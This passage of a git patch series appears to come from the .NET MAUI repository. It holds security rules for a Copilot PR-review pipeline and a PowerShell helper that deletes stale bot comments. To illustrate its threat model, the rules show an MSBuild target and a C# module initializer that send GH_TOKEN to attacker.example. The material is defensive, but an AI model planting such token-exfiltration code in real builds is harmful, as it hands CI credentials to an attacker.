privileged tokens in scope**: + +| Token | Identity | Scope | +|-------|----------|-------| +| `GH_COMMENT_TOKEN` (a.k.a. `GH_TOKEN`) | `maui-bot` PAT | comment / label / review on every PR in the repo | +| `COPILOT_GITHUB_TOKEN` | Copilot app install token | enables the GitHub Copilot CLI | +| AzDO GitHub service-connection PAT (`dnceng-maui`) | GitHub App install token owned by DncEng | repo contents, PRs, issues, checks, workflows | + +A successful exfil of **any** of these = the attacker can take over PR review, post on behalf of the bot, push commits, or worse. Defending against this is non-negotiable when touching any file in this pipeline. + +--- + +## Threat model — assume the PR is hostile + +By the time Gate runs, the PR's code has been merged into the working tree. The PR author controls: + +- every file in the merged worktree (`.csproj`, `Directory.Build.targets`, `Directory.Build.props`, `*.cs`, `*.targets`, `*.props`, `*.yml`, source generators, analyzers, test code, `eng/`, `.github/` if not specifically protected) +- everything the pipeline subsequently `dotnet build`s, `dotnet test`s, or `pwsh -File`s out of the worktree +- anything those processes can write to under `$(Build.SourcesDirectory)` (working tree) including spoofing trusted output files + +The PR author **cannot** modify files copied to `$(Build.ArtifactStagingDirectory)/trusted-github/` **before** the PR is merged, **as long as those files are made read-only after copy**. + +--- + +## Rule 1 — Per-task token scoping (AzDO `env:` block) + +Each task's `env:` block contains **only** the tokens that exact task needs. + +```yaml +# ✅ correct — Task 3 (CopilotReview) gets ONLY the copilot token +- bash: | + pwsh -NoProfile "$TRUSTED/scripts/Review-PR.ps1" -Phase CopilotReview ... 
+ env: + COPILOT_GITHUB_TOKEN: $(COPILOT_TOKEN) + # NO GH_TOKEN here — Copilot can't post comments or push +``` + +```yaml +# ❌ wrong — leaks the comment token into the Copilot agent's env +- bash: | + pwsh -NoProfile "$TRUSTED/scripts/Review-PR.ps1" -Phase CopilotReview ... + env: + COPILOT_GITHUB_TOKEN: $(COPILOT_TOKEN) + GH_TOKEN: $(GH_COMMENT_TOKEN) +``` + +When invoking the Copilot CLI, also pass `--secret-env-vars=GH_TOKEN,COPILOT_GITHUB_TOKEN,GITHUB_TOKEN` so the CLI redacts them from its own argv/log output. + +## Rule 2 — `persistCredentials: false` on every `checkout: self` + +AzDO's default `checkout: self` writes the service-connection PAT to `.git/config` as: + +``` +[http "https://github.com/"] + extraheader = AUTHORIZATION: bearer <token> +``` + +Any subprocess on the runner — including PR-controlled code — can `cat .git/config` and exfiltrate it. **Always** add `persistCredentials: false` unless the task itself needs to push. + +```yaml +# ✅ correct +- checkout: self + persistCredentials: false + fetchDepth: 1 +``` + +```yaml +# ❌ wrong — service-connection PAT persists in .git/config for the rest of the job +- checkout: self + fetchDepth: 1 +``` + +This applies to **every** job/stage in this pipeline (the PR-review job, the deep-UI-tests job, the post-comment job, etc.), not just the one that runs the agent. + +## Rule 3 — Copy trusted scripts BEFORE the PR is merged, then make them read-only + +The Setup task does `checkout: self` of `main` (no PR merge yet) and copies known-good scripts/skills/configs to a trusted directory. Subsequent tasks must invoke those scripts **from the trusted copy**, never from the merged worktree.
+ +```bash +# ✅ correct — in Setup task, BEFORE any `git merge` of PR code +TRUSTED="$(Build.ArtifactStagingDirectory)/trusted-github" +mkdir -p "$TRUSTED" +cp -r .github/scripts "$TRUSTED/scripts" +cp -r .github/skills "$TRUSTED/skills" +cp -r eng/scripts "$TRUSTED/eng-scripts" +chmod -R a-w "$TRUSTED" # ← prevents PR code from rewriting trusted scripts at runtime +``` + +When adding a new pipeline step that invokes a `.ps1`/`.sh`/`.py` script from the repo, follow the convention in `Review-PR.ps1`: + +```powershell +# ✅ correct — resolve via the trusted dir +$ScriptsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'scripts' } else { $PSScriptRoot } +$SkillsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'skills' } else { Join-Path $PSScriptRoot '../skills' } +$EngScriptsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'eng-scripts' } else { Join-Path $PSScriptRoot '../../eng/scripts' } + +& "$SkillsDir/foo/scripts/foo.ps1" ... +``` + +```powershell +# ❌ wrong — runs the PR's version of the script, with all of Gate's tokens in env +$detectScript = Join-Path $RepoRoot "eng/scripts/detect-ui-test-categories.ps1" +& $detectScript -PRNumber $PRNumber +``` + +**If you add a new script** that needs to be invoked after PR merge, you must also add it to the Setup-task copy block and reference it via the corresponding `$*Dir` variable. + +## Rule 4 — Strip tokens from env before invoking PR-controlled code + +Even when the *calling* script is trusted, the *subprocess* may be PR-controlled. `dotnet build`/`dotnet test`/`dotnet run` execute the PR's MSBuild graph (`Directory.Build.targets`, `.csproj` `<Target>` blocks, source generators, analyzers, then the test/app code).
Any of those can read `Environment.GetEnvironmentVariable("GH_TOKEN")` or `$(GH_TOKEN)` MSBuild property and exfiltrate via: + +```xml +<!-- attacker's Directory.Build.targets --> +<Target Name="Leak" BeforeTargets="Build"> + <Exec Command="curl https://attacker.example/?t=$(GH_TOKEN)" /> +</Target> +``` + +```csharp +// attacker's test code +[ModuleInitializer] +public static void Leak() => new HttpClient().GetAsync("https://attacker.example/?t=" + + Environment.GetEnvironmentVariable("GH_TOKEN")); +``` + +The same applies to invocations of `BuildAndRunHostApp.ps1`, `Run-DeviceTests.ps1`, `verify-tests-fail.ps1`, `Invoke-UITestWithRetry.ps1` — all of these *internally* run `dotnet build`/`dotnet test` against PR code. + +Use the `Invoke-WithoutGhTokens` helper in `Review-PR.ps1` (or add an equivalent if writing a new orchestration script): + +```powershell +# ✅ correct — token stripped for the subprocess only, restored after +$testOutput = Invoke-WithoutGhTokens { + dotnet test $resolvedProj --filter $t.Filter --logger "console;verbosity=minimal" 2>&1 +} +``` + +```powershell +# ❌ wrong — Gate has GH_TOKEN in env; the PR-modified .csproj inherits it +$testOutput = dotnet test $resolvedProj --filter $t.Filter ... +``` + +**Trusted metadata-fetch scripts** (`Detect-TestsInDiff.ps1`, `Find-RegressionRisks.ps1`, `detect-ui-test-categories.ps1`) call `gh` CLI and **need** `GH_TOKEN`. Don't wrap them. The split is: *trusted script reading PR metadata via `gh`* → keeps `GH_TOKEN`; *trusted script invoking PR-controlled code* → wraps in `Invoke-WithoutGhTokens`. + +## Rule 5 — Cross-phase signal files live outside the working tree + +The merged worktree is writable by any PR-controlled process. Anything the next phase trusts (gate verdict, sentinel files, category lists, phase-complete markers) must be written to `$(Agent.TempDirectory)` (or `$TRUSTED`), **never** to a path inside `$RepoRoot`. + +```powershell +# ✅ correct — Agent.TempDirectory is per-job, outside the worktree, not writable by PR code +$gateVerdictDir = if ($env:AGENT_TEMPDIRECTORY) { $env:AGENT_TEMPDIRECTORY } else { Join-Path $RepoRoot "CustomAgentLogsTmp/..."
} +"PASS" | Set-Content (Join-Path $gateVerdictDir "gate-result.txt") +``` + +```powershell +# ❌ wrong — a malicious test in the PR can overwrite gate-result.txt with "PASS" +"PASS" | Set-Content (Join-Path $RepoRoot "CustomAgentLogsTmp/.../gate-result.txt") +``` + +The corresponding sentinel-read in a later phase MUST live at the same trusted location and MUST NOT silently fall back to the worktree path if missing. + +## Rule 6 — Strip `##vso[...]` from PR-controlled output + +`##vso[task.setvariable variable=X]value` lines in stdout are interpreted by the AzDO agent as commands to set pipeline variables. PR-controlled code (test output, build output) must have those stripped before the agent sees them, otherwise the PR can promote attacker-controlled values into pipeline variables read by subsequent tasks. + +```bash +# ✅ correct — strip CR (Windows line endings would slip past a simpler regex), then drop vso commands +"$TRUSTED/scripts/Review-PR.ps1" ... 2>&1 | tr -d '\r' | sed -E 's/##vso\[[^]]*\]//g' +``` + +```bash +# ❌ wrong — bare sed won't match if PR output has CRLF line endings +"$TRUSTED/scripts/Review-PR.ps1" ... 2>&1 | sed 's/##vso\[.*\]//g' +``` + +## Rule 7 — `gh-aw` workflows: pin version, regenerate `.lock.yml`, restore trusted `.github/` + +For files under `.github/workflows/shared/` and any `gh-aw` `.md` workflow: + +- **Pin the gh-aw compiler version.** Versions ≥ v0.68.4 strip required permissions (`pull-requests: write`) — see `gh-aw#28767`. Pin to a known-good version in the workflow frontmatter. +- **Regenerate the `.lock.yml`** with `gh aw compile` **in the same commit** as any `.md` frontmatter change. A stale lock file causes every dispatch to fail with `ERR_CONFIG: Lock file ... is outdated!`. +- **`workflow_dispatch` triggers must restore trusted `.github/` from main** (use `.github/scripts/Checkout-GhAwPr.ps1` pattern) so that a malicious PR can't supply its own workflow logic via `workflow_dispatch`. 
+ +## Rule 8 — Don't pass tokens through pipeline variables that subsequent tasks read + +```yaml +# ❌ wrong — once written to AzDO variable store, the value is visible to every later task +- bash: echo "##vso[task.setvariable variable=MyToken;issecret=true]$(GH_TOKEN)" +``` + +Tokens come from variable groups linked at the pipeline level. Don't republish them. Don't write them to files in the worktree. Don't `echo` them — even with `issecret=true`, this widens the blast radius. + +--- + +## Code-review checklist for this surface + +When reviewing or authoring a change to any file matched by this instruction's `applyTo`, walk this list: + +- [ ] Every new/modified AzDO `checkout: self` has `persistCredentials: false` (unless the task pushes, in which case add a comment explaining why). +- [ ] Every new/modified `env:` block on a task contains **only** the tokens that task needs. The Copilot-agent task never has `GH_TOKEN`. +- [ ] Every new script invoked from the pipeline after PR merge is resolved via `$ScriptsDir` / `$SkillsDir` / `$EngScriptsDir` (or the calling script's equivalent), not `$RepoRoot/...`. +- [ ] If a new script was added to `.github/scripts/`, `.github/skills/`, or `eng/scripts/` that needs to run post-merge, it's covered by the trusted-copy block in `ci-copilot.yml` Setup task. +- [ ] Every new invocation of `dotnet build|test|run|pack`, `msbuild`, `dotnet cake`, `BuildAndRunHostApp.ps1`, `BuildAndRun*.ps1`, `Run-DeviceTests.ps1`, `verify-tests-fail.ps1`, `Invoke-UITestWithRetry.ps1`, or any other process that executes PR-controlled code is wrapped in `Invoke-WithoutGhTokens { ... }`. +- [ ] Every cross-phase signal file (verdict, sentinel, intermediate state) is written to `$(Agent.TempDirectory)` / `$TRUSTED`, never to `$RepoRoot/...`. +- [ ] Any new pipeline output that includes stdout from PR-controlled code is filtered with `tr -d '\r' | sed -E 's/##vso\[[^]]*\]//g'`. 
+- [ ] If a `.github/workflows/*.md` (gh-aw) was edited, the corresponding `.lock.yml` was regenerated with `gh aw compile` in the same commit. +- [ ] Token names are never written to log lines, even with `Write-Host`/`echo`. Token *values* are never written to files in the worktree. + +## Anti-patterns to grep for during review + +```bash +# Token leak to PR-controlled subprocess +git grep -nE 'dotnet (test|build|run|pack)' eng/pipelines/ci-copilot.yml .github/scripts/ .github/skills/ | grep -v Invoke-WithoutGhTokens + +# Script invoked from PR worktree instead of trusted copy +git grep -nE 'Join-Path \$RepoRoot ".*\.(ps1|sh)"' .github/scripts/ .github/skills/ + +# Missing persistCredentials +git grep -nA1 'checkout: self' eng/pipelines/ci-copilot.yml | grep -v persistCredentials + +# Cross-phase state in worktree +git grep -nE 'Set-Content.*\$RepoRoot.*(gate-result|sentinel|verdict)' .github/scripts/ .github/skills/ + +# Bare ##vso strip without CR handling +git grep -nE "sed.*##vso" eng/pipelines/ci-copilot.yml | grep -v "tr -d" +``` + +--- + +## References + +- **PR #35324** — refactor that introduced the 4-task split and surfaced these issues +- **MauiBot 2026-05-24 review** of PR #35324 — flagged Rules 3 and 4 violations +- **PR #35376** — earlier change that re-introduced missing `persistCredentials: false` on cross-stage checkouts +- **`Review-PR.ps1`** — canonical implementation of `$ScriptsDir`/`$SkillsDir`/`$EngScriptsDir` resolution and `Invoke-WithoutGhTokens` helper +- **`ci-copilot.yml` Setup task** — canonical trusted-copy + `chmod -R a-w` pattern From 07565bb94df0b6dd33c6a3c29ceaefc21b6251e2 Mon Sep 17 00:00:00 2001 From: Copilot <223556219+Copilot@users.noreply.github.com> Date: Tue, 26 May 2026 11:23:28 +0200 Subject: [PATCH 09/34] Clean up stale MauiBot PR comments Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- .github/scripts/Review-PR.ps1 | 38 +++- .github/scripts/post-ai-summary-comment.ps1 | 115 +++++------ 
.../shared/Remove-StaleMauiBotComments.ps1 | 185 ++++++++++++++++++ eng/pipelines/ci-copilot.yml | 13 +- 4 files changed, 279 insertions(+), 72 deletions(-) create mode 100644 .github/scripts/shared/Remove-StaleMauiBotComments.ps1 diff --git a/.github/scripts/Review-PR.ps1 b/.github/scripts/Review-PR.ps1 index 607c06079198..432fdc2219e4 100644 --- a/.github/scripts/Review-PR.ps1 +++ b/.github/scripts/Review-PR.ps1 @@ -112,6 +112,11 @@ $ScriptsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'scripts $SkillsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'skills' } else { Join-Path $PSScriptRoot '../skills' } $EngScriptsDir = if ($TrustedScriptsDir) { Join-Path $TrustedScriptsDir 'eng-scripts' } else { Join-Path $PSScriptRoot '../../eng/scripts' } +$commentCleanupScript = Join-Path $ScriptsDir "shared/Remove-StaleMauiBotComments.ps1" +if (Test-Path $commentCleanupScript) { + . $commentCleanupScript +} + # Gate has GH_TOKEN in env so trusted code (Detect-TestsInDiff, Find-RegressionRisks, # detect-ui-test-categories) can fetch PR metadata via `gh` CLI. Any subprocess that # executes PR-controlled code (MSBuild targets, test code, source generators, host-app @@ -307,6 +312,13 @@ if ($DryRun) { } else { Write-Host " ⚠️ No changes to merge (PR may already be up to date)" -ForegroundColor Yellow } + + if (Get-Command Remove-StaleMauiBotIssueComments -ErrorAction SilentlyContinue) { + Remove-StaleMauiBotIssueComments ` + -PRNumber $PRNumber ` + -IncludeMergeConflict ` + -Reason "resolved merge-conflict notice" + } } else { Write-Host " ❌ Squash-merge had conflicts." 
-ForegroundColor Red git merge --abort 2>$null @@ -317,8 +329,18 @@ if ($DryRun) { git branch -D $reviewBranch 2>$null git branch -D $tempBranch 2>$null + if (Get-Command Remove-StaleMauiBotIssueComments -ErrorAction SilentlyContinue) { + Remove-StaleMauiBotIssueComments ` + -PRNumber $PRNumber ` + -IncludeMergeConflict ` + -Reason "stale merge-conflict notice" + } + # Post a comment on the PR about merge conflicts - $conflictBody = "⚠️ **Merge Conflict Detected** — This PR has merge conflicts with its target branch. Please rebase onto the target branch and resolve the conflicts." + $conflictBody = @" + +⚠️ **Merge Conflict Detected** — This PR has merge conflicts with its target branch. Please rebase onto the target branch and resolve the conflicts. +"@ try { gh pr comment $PRNumber --body $conflictBody 2>&1 | Out-Null Write-Host " 📝 Posted merge conflict comment on PR" -ForegroundColor Cyan @@ -2165,6 +2187,19 @@ if (Test-Path $winnerFile) { $isPRWinner = (-not $winner) -or ($winner.isPRFix -eq $true) +if (Get-Command Remove-StaleMauiBotIssueComments -ErrorAction SilentlyContinue) { + Remove-StaleMauiBotIssueComments ` + -PRNumber $PRNumber ` + -IncludeTryFix ` + -Reason "stale try-fix notice" +} + +if (Get-Command Dismiss-StaleMauiBotTryFixReviews -ErrorAction SilentlyContinue) { + Dismiss-StaleMauiBotTryFixReviews ` + -PRNumber $PRNumber ` + -Reason "stale try-fix review" +} + if ($isPRWinner) { # Post inline review comments (file:line findings from expert-reviewer agent) $inlineScript = Join-Path $summaryScriptsDir "post-inline-review.ps1" @@ -2223,6 +2258,7 @@ if ($isPRWinner) { $rationale = if ($winner.summary) { [string]$winner.summary } else { "Automated review identified a stronger candidate fix." 
} $reviewBody = @" + 🤖 **Automated review — alternative fix proposed** The expert-reviewer evaluation compared the PR fix against $($winner.winner -replace 'try-fix-','#') automatically generated candidates and selected ``$($winner.winner)`` as the strongest fix. diff --git a/.github/scripts/post-ai-summary-comment.ps1 b/.github/scripts/post-ai-summary-comment.ps1 index 5e375790fe02..26d25a082058 100644 --- a/.github/scripts/post-ai-summary-comment.ps1 +++ b/.github/scripts/post-ai-summary-comment.ps1 @@ -1,12 +1,14 @@ #!/usr/bin/env pwsh <# .SYNOPSIS - Posts or updates the AI review summary comment on a GitHub Pull Request. + Posts the AI review summary comment on a GitHub Pull Request. .DESCRIPTION Maintains ONE comment per PR, identified by marker. + Before posting a fresh comment, any older generated AI Summary comments are + removed. Existing session blocks are preserved in the newly posted comment. Each review run adds an expandable session keyed by HEAD commit SHA. - - Same commit SHA → replaces that session in-place. + - Same commit SHA → replaces that session in the newly posted comment. - New commit SHA → prepends a new session (latest first). Older sessions stay collapsed; the newest is expanded by default. @@ -22,7 +24,7 @@ (gate-only update) and once after the review phases finish (full update). Any standalone legacy "" comment from older versions of - the script is deleted after a successful post to avoid duplicates. + the script is deleted before the fresh comment is posted to avoid duplicates. .PARAMETER PRNumber The pull request number (required) @@ -48,6 +50,11 @@ param( $ErrorActionPreference = "Stop" $MARKER = "" +$commentCleanupScript = Join-Path $PSScriptRoot "shared/Remove-StaleMauiBotComments.ps1" +if (Test-Path $commentCleanupScript) { + . 
$commentCleanupScript +} + # ============================================================================ # LOAD PHASE CONTENT # ============================================================================ @@ -244,42 +251,47 @@ function Merge-Sessions { # ============================================================================ Write-Host "Checking for existing review comment..." -ForegroundColor Yellow -$existingCommentId = $null $existingBody = $null +$existingCommentIds = @() $existingRaw = gh api "repos/dotnet/maui/issues/$PRNumber/comments" --paginate 2>$null -$existingObj = $null if ($existingRaw) { try { $allComments = $existingRaw | ConvertFrom-Json - $existingObj = @($allComments | Where-Object { $_.body -and $_.body.Contains($MARKER) }) | Select-Object -Last 1 + $existingObjs = @($allComments | Where-Object { $_.body -and $_.body.Contains($MARKER) }) + if ($existingObjs.Count -gt 0) { + $existingCommentIds = @($existingObjs | ForEach-Object { $_.id }) + $existingBodies = @($existingObjs | ForEach-Object { [string]$_.body }) + $existingBody = $existingBodies -join "`n`n---`n`n" + Write-Host "✓ Found existing AI Summary comment(s): $($existingCommentIds -join ', ')" -ForegroundColor Green + } } catch { Write-Host "⚠️ Could not parse comments: $_" -ForegroundColor Yellow } } -if ($existingObj -and $existingObj.id) { - $existingCommentId = $existingObj.id - $existingBody = $existingObj.body - Write-Host "✓ Found existing comment (ID: $existingCommentId)" -ForegroundColor Green -} - $authorPing = "" if ($prAuthor) { $authorPing = "> 👋 @$prAuthor — new AI review results are available. Please review the latest session below." 
} +$finalizeSection = "" +$finalizePattern = '(?s)(.*?)' +if ($existingBodies -and $existingBodies.Count -gt 0) { + for ($i = $existingBodies.Count - 1; $i -ge 0; $i--) { + if ($existingBodies[$i] -match $finalizePattern) { + $finalizeSection = "`n`n" + $Matches[1] + break + } + } +} + if ($existingBody) { - # Merge new session into existing body + # Merge new session into all existing AI Summary bodies before deleting the + # old comments. This keeps prior session history even if retries created + # multiple generated comments. $mergedSessions = Merge-Sessions -ExistingBody $existingBody -NewSession $newSessionBlock -CommitSha7 $commitSha7 - # Preserve any PR-FINALIZE section that may already exist - $finalizeSection = "" - $finalizePattern = '(?s)(.*?)' - if ($existingBody -match $finalizePattern) { - $finalizeSection = "`n`n" + $Matches[1] - } - $commentBody = @" $MARKER @@ -319,56 +331,35 @@ if ($DryRun) { } # ============================================================================ -# POST OR UPDATE COMMENT +# DELETE STALE GENERATED COMMENTS, THEN POST COMMENT # ============================================================================ $tempFile = [System.IO.Path]::GetTempFileName() try { @{ body = $commentBody } | ConvertTo-Json -Depth 10 | Set-Content -Path $tempFile -Encoding UTF8 - if ($existingCommentId) { - Write-Host "Updating comment (ID: $existingCommentId)..." 
-ForegroundColor Yellow - try { - gh api --method PATCH "repos/dotnet/maui/issues/comments/$existingCommentId" --input $tempFile 2>&1 | Out-Null - if ($LASTEXITCODE -ne 0) { throw "PATCH failed" } - Write-Host "✅ Review comment updated" -ForegroundColor Green - Write-Output "COMMENT_ID=$existingCommentId" - } catch { - Write-Host "⚠️ Could not update comment $existingCommentId : $_" -ForegroundColor Yellow - $newJson = gh api --method POST "repos/dotnet/maui/issues/$PRNumber/comments" --input $tempFile - $newId = ($newJson | ConvertFrom-Json).id - Write-Host "✅ Review comment posted (ID: $newId)" -ForegroundColor Green - Write-Output "COMMENT_ID=$newId" - } - } else { - Write-Host "Creating new review comment..." -ForegroundColor Yellow - $newJson = gh api --method POST "repos/dotnet/maui/issues/$PRNumber/comments" --input $tempFile - $newId = ($newJson | ConvertFrom-Json).id - Write-Host "✅ Review comment posted (ID: $newId)" -ForegroundColor Green - Write-Output "COMMENT_ID=$newId" + if (Get-Command Remove-StaleMauiBotIssueComments -ErrorAction SilentlyContinue) { + Remove-StaleMauiBotIssueComments ` + -PRNumber $PRNumber ` + -IncludeAISummary ` + -IncludeLegacyGate ` + -IncludeMergeConflict ` + -IncludeTryFix ` + -Reason "stale generated PR review comment" } -} finally { - Remove-Item $tempFile -ErrorAction SilentlyContinue -} -# ============================================================================ -# CLEAN UP LEGACY STANDALONE GATE COMMENTS -# ============================================================================ -# Earlier versions of this workflow posted gate results in a separate comment -# marked with . Now that the gate is included as a section in -# this unified comment, those legacy comments are duplicates and should go. 
+ if (Get-Command Dismiss-StaleMauiBotTryFixReviews -ErrorAction SilentlyContinue) { + Dismiss-StaleMauiBotTryFixReviews -PRNumber $PRNumber + } -try { - $legacyMarker = "" - $allRaw = gh api "repos/dotnet/maui/issues/$PRNumber/comments" --paginate 2>$null - if ($allRaw) { - $allComments = $allRaw | ConvertFrom-Json - $legacy = @($allComments | Where-Object { $_.body -and $_.body.Contains($legacyMarker) }) - foreach ($lc in $legacy) { - Write-Host "🧹 Deleting legacy gate comment (ID: $($lc.id))..." -ForegroundColor Gray - gh api --method DELETE "repos/dotnet/maui/issues/comments/$($lc.id)" 2>&1 | Out-Null - } + Write-Host "Creating new review comment..." -ForegroundColor Yellow + $newJson = gh api --method POST "repos/dotnet/maui/issues/$PRNumber/comments" --input $tempFile + if ($LASTEXITCODE -ne 0) { + throw "Failed to post AI Summary comment" } -} catch { - Write-Host "⚠️ Legacy gate-comment cleanup failed (non-fatal): $_" -ForegroundColor Yellow + $newId = ($newJson | ConvertFrom-Json).id + Write-Host "✅ Review comment posted (ID: $newId)" -ForegroundColor Green + Write-Output "COMMENT_ID=$newId" +} finally { + Remove-Item $tempFile -ErrorAction SilentlyContinue } diff --git a/.github/scripts/shared/Remove-StaleMauiBotComments.ps1 b/.github/scripts/shared/Remove-StaleMauiBotComments.ps1 new file mode 100644 index 000000000000..850801483647 --- /dev/null +++ b/.github/scripts/shared/Remove-StaleMauiBotComments.ps1 @@ -0,0 +1,185 @@ +#!/usr/bin/env pwsh + +$script:MauiBotCommentAuthors = @( + 'MauiBot', + 'maui-bot', + 'maui-bot[bot]', + 'github-actions[bot]' +) + +$script:AiSummaryCommentMarker = '' +$script:AiGateCommentMarker = '' +$script:MergeConflictCommentMarker = '' +$script:TryFixCommentMarker = '' + +function Test-IsMauiBotCommentAuthor { + param([object]$Comment) + + $login = [string]$Comment.user.login + if ([string]::IsNullOrWhiteSpace($login)) { + return $false + } + + return @($script:MauiBotCommentAuthors | Where-Object { $_ -ieq $login }).Count 
-gt 0 +} + +function Test-IsMergeConflictCommentBody { + param([string]$Body) + + if ([string]::IsNullOrWhiteSpace($Body)) { + return $false + } + + return $Body.Contains($script:MergeConflictCommentMarker) -or + ($Body.Contains('**Merge Conflict Detected**') -and $Body.Contains('This PR has merge conflicts with its target branch.')) +} + +function Test-IsTryFixCommentBody { + param([string]$Body) + + if ([string]::IsNullOrWhiteSpace($Body)) { + return $false + } + + return $Body.Contains($script:TryFixCommentMarker) -or + ($Body.Contains('Automated review') -and $Body.Contains('alternative fix proposed')) -or + ($Body.Contains('try-fix-') -and $Body.Contains('Candidate diff')) +} + +function Get-GitHubIssueComments { + param([Parameter(Mandatory = $true)][int]$PRNumber) + + $raw = gh api "repos/dotnet/maui/issues/$PRNumber/comments?per_page=100" --paginate 2>$null + if ($LASTEXITCODE -ne 0 -or [string]::IsNullOrWhiteSpace($raw)) { + return @() + } + + try { + return @($raw | ConvertFrom-Json) + } catch { + Write-Host " Warning: could not parse PR comments for cleanup: $_" -ForegroundColor Yellow + return @() + } +} + +function Remove-StaleMauiBotIssueComments { + [CmdletBinding()] + param( + [Parameter(Mandatory = $true)] + [int]$PRNumber, + + [switch]$IncludeAISummary, + [switch]$IncludeLegacyGate, + [switch]$IncludeMergeConflict, + [switch]$IncludeTryFix, + + [string]$Reason = 'stale MauiBot comment', + [switch]$DryRun + ) + + $comments = Get-GitHubIssueComments -PRNumber $PRNumber + if (-not $comments -or $comments.Count -eq 0) { + return + } + + $staleComments = @() + foreach ($comment in $comments) { + $body = [string]$comment.body + if ([string]::IsNullOrWhiteSpace($body)) { + continue + } + + $matchesGeneratedMarker = + ($IncludeAISummary -and $body.Contains($script:AiSummaryCommentMarker)) -or + ($IncludeLegacyGate -and $body.Contains($script:AiGateCommentMarker)) + + $matchesBotOnlyContent = + (Test-IsMauiBotCommentAuthor $comment) -and ( + 
($IncludeMergeConflict -and (Test-IsMergeConflictCommentBody $body)) -or + ($IncludeTryFix -and (Test-IsTryFixCommentBody $body)) + ) + + if ($matchesGeneratedMarker -or $matchesBotOnlyContent) { + $staleComments += $comment + } + } + + foreach ($comment in $staleComments) { + if ($DryRun) { + Write-Host " [DryRun] Would delete $Reason (comment ID: $($comment.id))" -ForegroundColor Magenta + continue + } + + try { + Write-Host " Deleting $Reason (comment ID: $($comment.id))..." -ForegroundColor Gray + $deleteOutput = gh api --method DELETE "repos/dotnet/maui/issues/comments/$($comment.id)" 2>&1 + if ($LASTEXITCODE -ne 0) { + throw "DELETE failed (exit code $LASTEXITCODE): $deleteOutput" + } + } catch { + Write-Host " Warning: could not delete $Reason comment $($comment.id): $_" -ForegroundColor Yellow + } + } +} + +function Get-GitHubPullRequestReviews { + param([Parameter(Mandatory = $true)][int]$PRNumber) + + $raw = gh api "repos/dotnet/maui/pulls/$PRNumber/reviews?per_page=100" --paginate 2>$null + if ($LASTEXITCODE -ne 0 -or [string]::IsNullOrWhiteSpace($raw)) { + return @() + } + + try { + return @($raw | ConvertFrom-Json) + } catch { + Write-Host " Warning: could not parse PR reviews for cleanup: $_" -ForegroundColor Yellow + return @() + } +} + +function Dismiss-StaleMauiBotTryFixReviews { + [CmdletBinding()] + param( + [Parameter(Mandatory = $true)] + [int]$PRNumber, + + [string]$Reason = 'superseded MauiBot try-fix review', + [switch]$DryRun + ) + + $reviews = Get-GitHubPullRequestReviews -PRNumber $PRNumber + if (-not $reviews -or $reviews.Count -eq 0) { + return + } + + $staleReviews = @($reviews | Where-Object { + (Test-IsMauiBotCommentAuthor $_) -and + ([string]$_.state -ieq 'CHANGES_REQUESTED') -and + (Test-IsTryFixCommentBody ([string]$_.body)) + }) + + foreach ($review in $staleReviews) { + if ($DryRun) { + Write-Host " [DryRun] Would dismiss $Reason (review ID: $($review.id))" -ForegroundColor Magenta + continue + } + + $tmp = New-TemporaryFile + 
try { + @{ message = 'Superseded by a newer MauiBot review run.' } | + ConvertTo-Json -Compress | + Set-Content -LiteralPath $tmp -Encoding UTF8 -NoNewline + + Write-Host " Dismissing $Reason (review ID: $($review.id))..." -ForegroundColor Gray + $dismissOutput = gh api --method PUT "repos/dotnet/maui/pulls/$PRNumber/reviews/$($review.id)/dismissals" --input $tmp.FullName 2>&1 + if ($LASTEXITCODE -ne 0) { + throw "dismissal failed (exit code $LASTEXITCODE): $dismissOutput" + } + } catch { + Write-Host " Warning: could not dismiss $Reason review $($review.id): $_" -ForegroundColor Yellow + } finally { + Remove-Item -LiteralPath $tmp -Force -ErrorAction SilentlyContinue + } + } +} diff --git a/eng/pipelines/ci-copilot.yml b/eng/pipelines/ci-copilot.yml index 91240747f5a2..8a571ef15eb2 100644 --- a/eng/pipelines/ci-copilot.yml +++ b/eng/pipelines/ci-copilot.yml @@ -1511,15 +1511,10 @@ stages: } # end if ($byCat.Count -gt 0) if ($isDeferred) { - # ── DEFERRED MODE: Post full comment with deep results included ── - # Guard against duplicate comments on pipeline retry: check if - # an AI Summary comment already exists for this PR. - $existingComment = gh api "repos/dotnet/maui/issues/$prNumber/comments?per_page=100" --paginate --jq '.[] | select(.body | contains("")) | .id' 2>$null | Select-Object -Last 1 - if ($existingComment) { - Write-Host "Existing AI Summary comment found ($existingComment) — will PATCH instead of creating new" - $commentId = $existingComment - $isDeferred = $false - } + # Keep deferred mode even if a prior AI Summary exists. The + # posting script preserves existing sessions, deletes stale + # generated comments, then posts a fresh unified comment. 
+ Write-Host "Deferred AI Summary posting will clean up any stale generated comments before posting" } if ($isDeferred) { From d3bcebda69c0649a7a2e6e7fb06489855f699c33 Mon Sep 17 00:00:00 2001 From: Tomas Grosup Date: Tue, 26 May 2026 11:40:10 +0200 Subject: [PATCH 10/34] [CI] Compact ci-copilot security instructions Trim 242 -> ~60 lines: drop redundant good/bad code pairs (the rule itself is the lesson), drop threat-model table (merged into intro), drop references section. Same 8 rules, same applyTo scope, same review checklist + grep anti-patterns. Co-authored-by: Copilot <223556219+Copilot@users.noreply.github.com> --- ...-copilot-pipeline-security.instructions.md | 250 +++--------------- 1 file changed, 30 insertions(+), 220 deletions(-) diff --git a/.github/instructions/ci-copilot-pipeline-security.instructions.md b/.github/instructions/ci-copilot-pipeline-security.instructions.md index c4bcfaa82252..d98cf17fab22 100644 --- a/.github/instructions/ci-copilot-pipeline-security.instructions.md +++ b/.github/instructions/ci-copilot-pipeline-security.instructions.md @@ -1,242 +1,52 @@ --- -description: "Security rules for the Copilot PR-review pipeline: token scoping, trusted-script copy, PR-controlled code isolation, AzDO/git credential handling." 
